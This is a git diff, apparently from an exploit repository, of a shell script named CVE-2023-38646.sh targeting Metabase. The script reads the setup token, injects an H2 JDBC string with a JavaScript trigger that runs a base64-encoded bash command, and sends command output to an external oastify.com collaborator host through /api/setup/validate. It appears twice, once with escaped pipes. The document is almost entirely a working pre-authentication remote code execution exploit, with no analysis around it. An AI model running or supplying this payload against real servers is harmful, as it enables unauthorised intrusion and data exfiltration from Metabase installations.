win3zz · July 28, 2023 16:32
diff --git a/CVE-2023-38646.sh b/CVE-2023-38646.sh
 TARGET="http://127.0.0.1:3000"; \
 COLLABORATOR="http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oastify.com/"; \
 COMMAND="uname -a"; \
 ENCODED_COMMAND=$(echo -n "curl -X POST -d \"\$(${COMMAND})\" ${COLLABORATOR}" | base64 | tr -d '\n' | sed 's/=/%3D/g'); \
 SETUP_TOKEN=$(curl -s "${TARGET}/api/session/properties" | jq -r '.["setup-token"]'); \
 PAYLOAD='{"token":"'${SETUP_TOKEN}'","details":{"details":{"db":"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER test BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('\''bash -c {echo,'${ENCODED_COMMAND}'}|{base64,-d}|{bash,-i}'\'')\n$$--=x","advanced-options": false},"engine":"h2"}}'; \
 curl -X POST -H "Content-Type: application/json" -d "${PAYLOAD}" "${TARGET}/api/setup/validate"
	TARGET="http://127.0.0.1:3000"; \
	COLLABORATOR="http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oastify.com/"; \
	COMMAND="uname -a"; \
	ENCODED_COMMAND=$(echo -n "curl -X POST -d \"\$(${COMMAND})\" ${COLLABORATOR}" \| base64 \| tr -d '\n' \| sed 's/=/%3D/g'); \
	SETUP_TOKEN=$(curl -s "${TARGET}/api/session/properties" \| jq -r '.["setup-token"]'); \
	PAYLOAD='{"token":"'${SETUP_TOKEN}'","details":{"details":{"db":"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER test BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('\''bash -c {echo,'${ENCODED_COMMAND}'}\|{base64,-d}\|{bash,-i}'\'')\n$$--=x","advanced-options": false},"engine":"h2"}}'; \
	curl -X POST -H "Content-Type: application/json" -d "${PAYLOAD}" "${TARGET}/api/setup/validate"